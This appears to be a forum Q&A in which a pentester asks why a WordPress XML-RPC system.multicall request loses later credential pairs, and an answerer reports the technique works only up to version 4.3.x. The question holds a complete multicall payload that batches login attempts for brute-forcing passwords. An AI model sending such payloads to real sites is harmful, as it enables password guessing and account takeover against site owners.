# system.multicall in wordpress XMLRPC always gives Incorrect username or password

Tags: java, post, jmeter, postman, xml-rpc

I'm pentesting in JMeter.For any wordpress site using xmlrpc, If I add correct username and password in first instance then I get proper output but If I add correct credentials in second instance (or thereafter) then I always get "incorrect username or password".

```
POST /xmlrpc.php HTTP/1.1
Host: example.com

<?xml version="1.0"?>
    <methodCall>
    <methodName>system.multicall</methodName>
    <params>
      <param><value><array><data>
      <value><struct>
      <member>
        <name>methodName</name>
        <value><string>wp.getUsersBlogs</string></value>
      </member>
      <member>
        <name>params</name><value><array><data>
        <value><array><data>
        <value><string>User1</string></value>
        <value><string>password1</string></value>
        </data></array></value>
        </data></array></value>
      </member>
      </struct></value>
      <value><struct>
      <member>
        <name>methodName</name>
        <value><string>wp.getUsersBlogs</string></value>
      </member>
      <member>
        <name>params</name>
        <value><array><data>
        <value><array><data>
          <value><string>User2</string></value>
          <value><string>Password2</string></value>
          </data></array></value>
        </data></array></value>
      </member>
      </struct></value>
      </data></array></value>
      </param>
    </params>
    </methodCall>
```

Answer (score 0):

I was playing with the same vulnerability and stumbled upon the same behavior.
I found [this GitHub issue](https://github.com/1N3/Wordpress-XMLRPC-Brute-Force-Exploit/issues/20) on an XML-RPC brute force project discussing the same problem. It seems that the vulnerability is already patched since WordPress version 4.7.x.
I'm still searching when this was patched exactly...

## Update

Really wanted to find out the vulnerable versions so now after installing countless WordPress versions, I was able to find out that the **vulnerability works up to version 4.3.29**.
From version 4.4 it no longer works for me.

I hope this calms someone's mind as it has calmed mine.